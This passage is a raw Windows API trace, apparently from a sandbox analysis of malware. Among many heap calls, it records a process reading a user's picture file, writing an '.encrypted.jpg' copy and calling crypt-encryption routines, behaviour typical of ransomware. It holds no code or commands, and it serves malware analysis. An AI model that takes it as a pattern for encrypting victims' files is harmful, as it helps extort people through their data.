lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.236] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0039.236] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.237] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.237] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0039.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.240] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.240] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.250] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x31c1, lpOverlapped=0x0) returned 1 [0039.251] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x131c1) returned 0xac0018 [0039.253] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.254] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.254] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.255] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.255] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.255] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.256] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.256] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 1 [0039.256] TranslateMessage (lpMsg=0x6ae324) returned 0 [0039.256] DispatchMessageW (lpMsg=0x6ae324) returned 0x0 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.256] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ad9c0) returned 1 [0039.257] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0039.257] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0039.257] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 